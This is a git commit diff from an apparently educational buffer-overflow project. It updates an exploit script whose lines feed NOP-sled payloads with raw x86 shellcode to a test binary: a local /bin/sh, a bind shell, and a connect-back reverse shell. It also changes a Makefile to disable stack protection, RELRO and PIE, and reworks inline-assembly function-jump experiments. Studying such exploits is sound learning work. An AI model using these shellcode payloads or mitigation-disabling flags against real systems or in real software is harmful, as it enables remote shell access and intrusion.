diff options
| author | toni <matzeton@googlemail.com> | 2016-07-19 16:22:57 +0200 |
|---|---|---|
| committer | toni <matzeton@googlemail.com> | 2016-07-19 16:22:57 +0200 |
| commit | bd131dc1d623c0708619ec95c5ece591e3462e89 (patch) | |
| tree | 8854cc6752b398be737de175f911c8c92271a3f9 | |
| parent | 16faa81d6f5e18669fce4cfb71fa771e8d80bf90 (diff) | |
| parent | 5776888c1bf385138f8e87dd62688018ddca4f57 (diff) | |
Merge branch 'master' of github.com:lnslbrty/bufflow
| -rw-r--r-- | .gitignore | 1 | ||||
| -rw-r--r-- | Makefile | 2 | ||||
| -rwxr-xr-x | exploit.sh | 6 | ||||
| -rw-r--r-- | funcjmp_ext_x86.c | 40 | ||||
| -rw-r--r-- | funcjmp_simple.c | 1 |
5 files changed, 20 insertions, 30 deletions
@@ -8,3 +8,4 @@ sc-test sc-test_x64 funcjmp_simple funcjmp_ext +format @@ -5,7 +5,7 @@ CC := gcc STRIP := strip LBITS := $(shell getconf LONG_BIT) CFLAGS += -Wall -OCFLAGS += -z execstack -fno-stack-protector +OCFLAGS += -zexecstack -znorelro -fno-stack-protector -fno-pie -ggdb -static X86_FLAGS = -m32 -mpreferred-stack-boundary=2 X64_FLAGS = -m64 -mpreferred-stack-boundary=4 SOURCES = $(wildcard *.c) @@ -14,7 +14,7 @@ if [ "$1" = "local" ]; then if [ $(getconf LONG_BIT) -eq 32 ]; then # 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr # uses own shellcode: shellcode/hello.asm (x86-nasm) - ./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\x12\xf4\xff\xbf"'` + ./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\xc4\xf2\xff\xbf"'` else # 133xNOP + shellcode(34) + 145xNOP + return addr # uses own shellcode: shellcode/execve_x64.o @@ -24,7 +24,7 @@ elif [ "$1" = "bind" ]; then if [ $(getconf LONG_BIT) -eq 32 ]; then # 85xNOP + shellcode(134) + 85xNOP + return addr # uses own shellcode: shellcode/socket.asm (x86-nasm) - ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x12\xf4\xff\xbf"'` + ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'` else # 100xNOP + shellcode(149) + 63xNOP + return addr # uses own shellcode: shellcode/socket_x64.asm (x64-nasm) @@ -34,7 +34,7 @@ elif [ "$1" = "connect" ]; then if [ $(getconf LONG_BIT) -eq 32 ]; then # 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr # uses own shellcode: shellcode/connect.asm (x86-nasm) - ./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\x12\xf4\xff\xbf"'` + ./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'` fi else $0 diff --git a/funcjmp_ext_x86.c b/funcjmp_ext_x86.c index 6174bec..9bf20f4 100644 --- a/funcjmp_ext_x86.c +++ b/funcjmp_ext_x86.c @@ -5,48 +5,36 @@ #define INTEL_ASM(_asm_str) asm volatile(".intel_syntax noprefix"); \ asm volatile(_asm_str); \ asm volatile(".att_syntax prefix"); -#define JUMPABLE_FUNC(fname) __attribute__ ((__cdecl__)) int fname(void) -#define JMP_FUNC_DECL(func) void *fptr = (void *)( &func ); -#define JMP_TO_FUNC \ - INTEL_ASM(" \ - call getip; \ - jmp short donext; \ - cfunc: \ - mov eax,[fptr]; \ - add eax,0x0; \ - jmp eax; \ - ret; \ - getip: \ - nop; \ - jmp short cfunc; \ - donext: \ - "); - -#define PRE_JUMP(arg) - int hookable(char *arg0, int arg1, int arg2) { asm("label:"); - INTEL_ASM("nop; nop; nop; pop eax; pop eax"); + INTEL_ASM("nop; nop; nop"); + printf("hookable ..\n"); + asm("nop; nop; nop; pop %ebx; pop %eax; call *%eax; call *%ebx"); asm("jmp end"); return 0; } -int testfkt(void *param) +int testfkt(void) { printf("Subroutine ..\n"); + return 0; +} + +void testfkt2(void) +{ + printf("another Subroutine ..\n"); } int main(int argc, char **argv) { - asm("push %0" : : "m" (hookable)); - asm("push %0" : : "g" (hookable)); + printf("main(...)\n"); + asm("push %0" : : "g" (testfkt)); + asm("push %0" : : "g" (testfkt2)); asm("jmp label; \ end:"); - //hookable(NULL, 0x8, 0x9); - printf("Hello World!\n"); - testfkt(NULL); + printf("EOF!\n"); return 66; } diff --git a/funcjmp_simple.c b/funcjmp_simple.c index 9e756cf..63946c8 100644 --- a/funcjmp_simple.c +++ b/funcjmp_simple.c @@ -29,6 +29,7 @@ JUMPABLE_FUNC(testfkt) { int var0 = 0x1, var1 = 0x2, var2 = 0x3; var0 += var1 + var2; + printf("Subroutine: %d = %d + %d\n", var0, var1, var2); return 0; } |